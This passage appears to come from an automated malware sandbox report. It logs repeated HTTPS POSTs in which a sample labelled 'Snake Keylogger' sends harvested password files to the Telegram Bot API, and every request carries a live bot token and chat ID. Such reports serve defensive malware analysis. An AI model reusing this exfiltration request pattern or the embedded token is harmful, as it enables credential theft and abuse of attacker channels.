                                                                    2022-06-26 07:33:47 UTC272OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 66 64 39 30 64 65 39 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756fd90de94Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:33:48 UTC272INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:33:48 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:33:48 UTC273INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 32 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 32 37 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66928,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228827,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    162192.168.2.550017149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:33:48 UTC273OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756fddd29b8
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:33:48 UTC273OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 66 64 64 64 32 39 62 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756fddd29b8Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:33:48 UTC274INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:33:48 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:33:48 UTC274INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 32 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 32 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66929,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228828,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    163192.168.2.550018149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:33:48 UTC275OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756fe309bc3
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:33:48 UTC275OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 66 65 33 30 39 62 63 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756fe309bc3Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:33:48 UTC276INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:33:48 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:33:48 UTC276INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 33 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 32 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66930,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228828,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    164192.168.2.550019149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:33:49 UTC276OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756fe6771e4
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:33:49 UTC277OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 66 65 36 37 37 31 65 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756fe6771e4Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:33:49 UTC277INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:33:49 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 505
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:33:49 UTC278INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 33 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 32 39 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66931,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228829,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    165192.168.2.550020149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:33:50 UTC278OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756ff000861
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:33:50 UTC278OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 66 66 30 30 30 38 36 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756ff000861Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:33:50 UTC279INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:33:50 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:33:50 UTC279INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 33 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 33 30 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66932,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228830,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    166192.168.2.550021149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:33:50 UTC280OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756ff3ba338
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:33:50 UTC280OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 66 66 33 62 61 33 33 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756ff3ba338Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:33:50 UTC281INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:33:50 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:33:50 UTC281INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 33 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 33 30 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66934,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228830,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    167192.168.2.550022149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:33:50 UTC282OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756ff80c6dd
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:33:50 UTC282OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 66 66 38 30 63 36 64 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756ff80c6ddContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:33:51 UTC282INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:33:51 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:33:51 UTC283INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 33 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 33 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66935,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228831,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    168192.168.2.550023149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:33:51 UTC283OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756ffb53c00
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
